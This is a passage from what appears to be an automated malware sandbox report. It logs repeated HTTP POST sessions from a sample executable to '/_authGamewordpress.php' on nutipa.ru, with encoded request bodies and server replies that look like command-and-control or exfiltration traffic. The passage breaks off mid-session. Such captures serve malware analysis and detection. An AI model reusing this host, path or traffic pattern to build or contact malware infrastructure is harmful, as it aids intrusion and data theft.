                                                            server-timing: cfL4;desc="?proto=TCP&rtt=15507&min_rtt=10021&rtt_var=14730&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=27082&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            59 | 192.168.2.4 | 49823 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:39.872565985 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:40.216818094 CET | 2536 | OUT | Data Raw: 55 53 43 5b 5a 58 5d 54 5d 5a 56 51 50 5d 57 56 55 56 5e 47 5a 57 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USC[ZX]T]ZVQP]WVUV^GZW[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?=.):(5:A+-7?\'>&=0.^+;.F'#P 3
                                                            Dec 15, 2024 19:37:40.959101915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:41.211488008 CET | 800 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GGHq2oDnHRboVvJBRIHDPspPvV5aIyLZVO%2FL%2B0MKe0QBkllOdjhO%2BTJlDdZS3tACCuHOVwv9RfypqLxo8Jg%2BW6vvyfngB8%2ByxpZesrvmwv%2F6fY6mQ6BaVXwNWC4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bda0be64332-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4817&min_rtt=1698&rtt_var=6875&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=54782&cwnd=112&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            60 | 192.168.2.4 | 49824 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:41.459038019 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2532
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:41.810499907 CET | 2532 | OUT | Data Raw: 55 54 43 5c 5a 58 58 56 5d 5a 56 51 50 58 57 57 55 50 5e 46 5a 55 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UTC\ZXXV]ZVQPXWWUP^FZU[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\([>>97#?"E+87? Z%.9'>U)3Y0>"^<*;.F'#P 7
                                                            Dec 15, 2024 19:37:42.545125961 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:42.780071020 CET | 792 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=10Ys5p1uYCzwrwObiw2psTqrB4tEtm9BMCigegGj2LIrAfwLY9g96Hp%2FhtpeJjbqg1VxNoqjrcahf3h5xQTYmo0Cxg2VcyxGGi%2BFy6XE6twYgLx1YxIwmtu1WrU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288be3fcdb5e64-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3845&min_rtt=1666&rtt_var=4983&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2852&delivery_rate=76431&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            61 | 192.168.2.4 | 49825 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:43.021779060 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:43.373003960 CET | 2536 | OUT | Data Raw: 55 50 43 50 5a 5c 58 50 5d 5a 56 51 50 51 57 50 55 51 5e 42 5a 51 5b 5e 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UPCPZ\XP]ZVQPQWPUQ^BZQ[^\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^?=-?)?5-).(#?2*2=-U*3;X'>!=3/.F'#P


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            62 | 192.168.2.4 | 49826 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:43.838815928 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:44.186003923 CET | 1420 | OUT | Data Raw: 50 56 43 59 5f 5a 5d 55 5d 5a 56 51 50 5f 57 52 55 54 5e 41 5a 51 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PVCY_Z]U]ZVQP_WRUT^AZQ[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^<-&[)4!-+#?$'-1%X=Q* <$-6]< ),+.F'#P
                                                            Dec 15, 2024 19:37:44.926052094 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:45.160554886 CET | 944 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W1KrJ%2Bd74o8BZVqNB7v5fP2Z1RRx0HSiHjdmipP%2BLDsaKFTd5fM6KQaaDjNNI0EPYDYRSY0rx4cyRLDdDc8wTnmg3bSYdqxkhzLohN%2FLe0AMVguHvu5SwMVJQJ8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bf2da4b437b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7098&min_rtt=1760&rtt_var=11336&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1740&delivery_rate=32834&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 5d 21 14 31 0f 20 10 27 0d 2c 2c 32 0e 3c 0e 0a 40 26 21 22 01 24 38 38 05 2a 13 0e 0a 31 07 35 58 37 32 29 50 3e 24 35 1f 31 0c 21 51 03 11 22 12 26 2e 27 02 2a 39 09 04 24 32 33 5e 31 3e 30 59 3f 3b 32 13 33 2b 3c 0c 20 00 0a 57 2d 3a 3f 05 2b 39 34 03 2e 2e 0b 0e 20 36 2e 53 0c 17 26 05 3c 39 32 12 21 21 35 1c 24 02 15 1c 37 39 0c 1e 29 0d 2b 0e 30 0a 34 0f 27 3d 38 51 22 20 25 1a 25 14 25 02 20 22 2a 1e 3e 08 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989]!1 ',,2<@&!"$88*15X72)P>$51!Q"&.'*9$23^1>0Y?;23+< W-:?+94.. 6.S&<92!!5$79)+04'=8Q" %%% "*>%\ .R4]T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            63 | 192.168.2.4 | 49827 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:43.956759930 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:44.310533047 CET | 2536 | OUT | Data Raw: 55 54 43 5f 5a 5c 58 56 5d 5a 56 51 50 59 57 53 55 5c 5e 48 5a 51 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UTC_Z\XV]ZVQPYWSU\^HZQ[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'<=>:/]!,(-48Z%=9'>* 3X&(%U8+.F'#P #
                                                            Dec 15, 2024 19:37:45.062305927 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:45.296602011 CET | 800 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMkzi%2BfG31HK487Hw8kiThbH2k%2F%2B%2BGa1O5lH7IoC1YdWUC8Xt%2BeYLS07xw0h3ZMfK03PJM2oJwFTn99JNKF9hRcO9m7lvGTj%2FCGh4gUD2HHSYUmQS7zxt8uh1g4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bf3af3ac45e-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3870&min_rtt=1554&rtt_var=5214&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=72701&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            64 | 192.168.2.4 | 49828 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:45.540293932 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:45.890837908 CET | 2536 | OUT | Data Raw: 55 57 43 50 5a 5d 5d 56 5d 5a 56 51 50 5d 57 52 55 55 5e 49 5a 52 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWCPZ]]V]ZVQP]WRUU^IZR[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?&[*,6/)<.7]#0]&:\'--U*0'%>!?,+.F'#P 3
                                                            Dec 15, 2024 19:37:46.635273933 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:46.875665903 CET | 789 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxGt83aOEwvU1OrI0Jben0kYG8K9vYrPclXz6Oyy6D5ILYtwV3g1jsNNqJvXP6aYh8D8iLM4IKgSCtzr9SMjOeWRSHhXFZdEu2a0HQgelMxn3zIJi1X6NNetVsc%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bfd8f8443b8-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8171&min_rtt=1650&rtt_var=13661&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=27126&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            65 | 192.168.2.4 | 49829 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:47.128005981 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:47.482573986 CET | 2536 | OUT | Data Raw: 50 55 43 58 5a 58 58 50 5d 5a 56 51 50 5d 57 57 55 53 5e 45 5a 56 5b 5e 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PUCXZXXP]ZVQP]WWUS^EZV[^\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$[+=9=(5"(771%&.>0'>!(6/.F'#P 3
                                                            Dec 15, 2024 19:37:48.218241930 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:48.471471071 CET | 798 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:48 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsQM%2FUBnkMglca%2Bq8MYNfCgEyHFsjM%2BdB36EA3L%2BtBkKmXK3s5MHbdpW%2BIvmTEet2g5lNIBBQYyn8XgAQujP0AAdHdSLlhHmqbImU2DayJ3Gna1X5tZjqYrmnnE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c0769454375-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3686&min_rtt=1693&rtt_var=4621&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=82771&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            66 | 192.168.2.4 | 49830 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:48.709377050 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:49.060678959 CET | 2536 | OUT | Data Raw: 55 53 46 58 5a 5a 5d 54 5d 5a 56 51 50 5b 57 5a 55 51 5e 45 5a 55 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USFXZZ]T]ZVQP[WZUQ^EZU[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?=)?*7\!?:(] +1.%-=(3Z0.]=0>-;.F'#P +
                                                            Dec 15, 2024 19:37:49.797719002 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:50.036365986 CET | 794 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:49 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QZAMLzmx8DsWCZnA2%2BcKd6IWs6NlaMsjnAaRl9KI%2FsEerhS3t%2FkZahOI8PwqREtEwrSMa6i18LYO8i2uKELOaM2KsxXGBxBkjA3Y9qPWEzyjo8WYKr8fLyXGO4I%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c1149cf72c2-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4224&min_rtt=2321&rtt_var=4677&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=83205&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            67 | 192.168.2.4 | 49832 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:50.290834904 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:50.638664007 CET | 1420 | OUT | Data Raw: 55 50 43 5a 5f 5d 5d 51 5d 5a 56 51 50 5a 57 55 55 50 5e 45 5a 53 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UPCZ_]]Q]ZVQPZWUUP^EZS[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\?=*8"(.8#(&%%Q*3(3>?#9V-;.F'#P /
                                                            Dec 15, 2024 19:37:51.382818937 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:51.645728111 CET | 945 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BW9VXQaAOMFSQGLjZl%2F3mrWPOQAaUUa8PhfejkHhErEgkV%2Bz5NxvlNHFvQLadhyLHsO52hggp6FC9tBxlxCP9HqDkfv9v2qAtfYLp8iir8RbLlEgnt%2FRvtLo78%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c1b3df9c33e-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4475&min_rtt=1587&rtt_var=6371&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1740&delivery_rate=59128&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 59 35 5c 21 0f 37 00 2b 0b 3a 12 36 0b 29 30 23 1b 27 22 0f 10 30 2b 3f 5f 3d 3d 09 52 26 07 31 5a 23 21 32 0d 3c 37 2a 00 31 0c 21 51 03 11 21 00 31 2e 02 5a 3d 17 3c 17 32 32 2f 5f 26 13 28 15 3c 38 04 50 24 28 09 55 37 3d 28 1b 3a 14 0a 12 3f 04 2c 03 3a 2d 2a 54 23 36 2e 53 0c 17 25 5d 3f 07 03 03 37 0c 18 0e 33 3c 2b 1f 34 2a 26 52 3e 0d 0d 08 24 0d 06 0e 27 00 38 14 22 0e 39 53 25 2a 2d 06 37 0c 2a 1e 2a 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989Y5\!7+:6)0#'"0+?_==R&1Z#!2<7*1!Q!1.Z=<22/_&(<8P$(U7=(:?,:-*T#6.S%]?73<+4*&R>$'8"9S%*-7**"%\ .R4]T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            68 | 192.168.2.4 | 49833 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:50.416258097 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:50.763670921 CET2536OUTData Raw: 55 53 43 58 5f 5e 5d 54 5d 5a 56 51 50 5f 57 50 55 51 5e 45 5a 50 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
